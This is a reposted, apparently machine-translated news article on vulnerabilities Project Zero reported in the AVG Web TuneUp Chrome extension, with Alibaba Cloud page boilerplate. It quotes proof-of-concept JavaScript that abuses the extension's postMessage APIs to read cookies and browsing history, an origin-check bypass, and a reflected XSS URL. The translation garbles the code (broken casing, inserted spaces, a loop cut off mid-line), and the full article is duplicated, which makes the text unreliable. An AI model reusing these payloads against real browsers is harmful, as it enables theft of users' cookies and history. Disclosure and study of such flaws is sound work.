Google browser plugin AVG Web TuneUp multiple high-risk vulnerabilities affect 9 million users

Source: Internet
Author: User

Google browser plugin AVG Web TuneUp multiple high-risk vulnerabilities affect 9 million users

In August 15 this year, Tavis, a member of project zero, submitted multiple vulnerabilities in Google's browser plug-in AVG Web TuneUp. The plug-in has a wide range of impact because it has approximately 9 million active users.
This plug-in adds a lot of APIs to operate Google browsers, such as easily hijacking the search box and new tabs. Because of its complicated installation process, Google can evade the inspection of malware, especially Google's browser's "preventing abuse of extended APIs.
In fact, many of these APIs are problematic. Attackers can construct payload to steal users' cookies on avg.com and obtain users' browsing records and other private data, it is even possible to successfully execute arbitrary commands.
Attack methods
Tavis listed several attack methods in the email to the vendor: "navigate" API will cause a common cross-origin xss vulnerability, attacker.com can read the mail.google.com emails of visitors or data from other websites across domains.
For (I = 0; I
The above code is the poc provided by Tavis.
Use window. postMessage (javascript api that allows cross-origin communication) to continuously send requests to the AVG: "Web TuneUP" plug-in. The requested data is:
{Origin: "web", action: "navigate", data: {url: "javascript: document. location. hostname. endsWith ('.avg.com')" + "? "+" Alert (document. domain + ':' + document. cookie) "+": "+" false ", tabID: I }}
When a user's tab accesses an avg.com website, the current domain name and cookie value of the website ending with .avg.com will be cracked. The "recently" api exposes the browsing history of the current user.
Window. addEventListener ("message", receiveMessage, false );
Window. postMessage ({from: "web", to: "content", method: "recently "},"*")
 
Function receiveMessage (event)
{
If (event. data! = Undefined & event. data. historyItems! = Undefined ){
Var obj = JSON. parse (event. data. historyItems );
 
Document. write ("Here is a list of websites you 've been visiting ");
Document. write ("
");
For (I in obj ){
Var d = new Date (obj [I]);
Document. write ("" + I + "on" + d );
Document. write ("
");
}
}
}
The above code is the poc provided by Tavis.
Use window. postMessage to send a request to the plug-in's "recently" API to obtain the browsing history of the current user, locally listen to events to obtain the returned data, and then output the data.
The vendor then fixed the issue. However, due to the incorrect fix, it was bypassed by Tavis. Added judgment in the repaired code
Var match = event. origin. match (/https? : \/. * \. Avg \. com/I );
 
If (match! Null {
...
}
Determine whether the source contains ".avg.com", but this is easy to bypass. For example, the https://www.avg.com.www.attacker.com domain name can bypass this limitation, continue to implement the above two attacks. The above judgment on the protocol is that both http and https are supported, and thus the man-in-the-middle attack problem occurs.
The vendor has fixed the issue. This time, the domain names must be "mysearch.avg.com" and "webtuneup.avg.com ". However, the following xss can steal user data:
Http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html? Risk = % 3 Cimg % 20src = x % 20 onerror = alert (1) % 3E & searchParams = % 7B % 22 lang % 22% 3A % 22en % 22% 2C % 22pid % 22% 3A % 22pid % 22% 2C % 22 v % 22% 3A % 22vv % 22% 7D
This problem is fixed in AVG Web TuneUp of version 4.2.5.169. You can upgrade it in the store.

In August 15 this year, Tavis, a member of project zero, submitted multiple vulnerabilities in Google's browser plug-in AVG Web TuneUp. The plug-in has a wide range of impact because it has approximately 9 million active users.
This plug-in adds a lot of APIs to operate Google browsers, such as easily hijacking the search box and new tabs. Because of its complicated installation process, Google can evade the inspection of malware, especially Google's browser's "preventing abuse of extended APIs.
In fact, many of these APIs are problematic. Attackers can construct payload to steal users' cookies on avg.com and obtain users' browsing records and other private data, it is even possible to successfully execute arbitrary commands.
Attack methods
Tavis listed several attack methods in the email to the vendor: "navigate" API will cause a common cross-origin xss vulnerability, attacker.com can read the mail.google.com emails of visitors or data from other websites across domains.
For (I = 0; I
The above code is the poc provided by Tavis.
Use window. postMessage (javascript api that allows cross-origin communication) to continuously send requests to the AVG: "Web TuneUP" plug-in. The requested data is:
{Origin: "web", action: "navigate", data: {url: "javascript: document. location. hostname. endsWith ('.avg.com')" + "? "+" Alert (document. domain + ':' + document. cookie) "+": "+" false ", tabID: I }}
When a user's tab accesses an avg.com website, the current domain name and cookie value of the website ending with .avg.com will be cracked. The "recently" api exposes the browsing history of the current user.

Window. addEventListener ("message", receiveMessage, false );
Window. postMessage ({from: "web", to: "content", method: "recently "},"*")
 
Function receiveMessage (event)
{
If (event. data! = Undefined & event. data. historyItems! = Undefined ){
Var obj = JSON. parse (event. data. historyItems );
 
Document. write ("Here is a list of websites you 've been visiting ");
Document. write ("
");
For (I in obj ){
Var d = new Date (obj [I]);
Document. write ("" + I + "on" + d );
Document. write ("
");
}
}
}
The above code is the poc provided by Tavis.
Use window. postMessage to send a request to the plug-in's "recently" API to obtain the browsing history of the current user, locally listen to events to obtain the returned data, and then output the data.
The vendor then fixed the issue. However, due to the incorrect fix, it was bypassed by Tavis. Added judgment in the repaired code
Var match = event. origin. match (/https? : \/. * \. Avg \. com/I );
 
If (match! Null {
...
}
Determine whether the source contains ".avg.com", but this is easy to bypass. For example, the https://www.avg.com.www.attacker.com domain name can bypass this limitation, continue to implement the above two attacks. The above judgment on the protocol is that both http and https are supported, and thus the man-in-the-middle attack problem occurs.
The vendor has fixed the issue. This time, the domain names must be "mysearch.avg.com" and "webtuneup.avg.com ". However, the following xss can steal user data:
Http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html? Risk = % 3 Cimg % 20src = x % 20 onerror = alert (1) % 3E & searchParams = % 7B % 22 lang % 22% 3A % 22en % 22% 2C % 22pid % 22% 3A % 22pid % 22% 2C % 22 v % 22% 3A % 22vv % 22% 7D
This problem is fixed in AVG Web TuneUp of version 4.2.5.169. You can upgrade it in the store.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.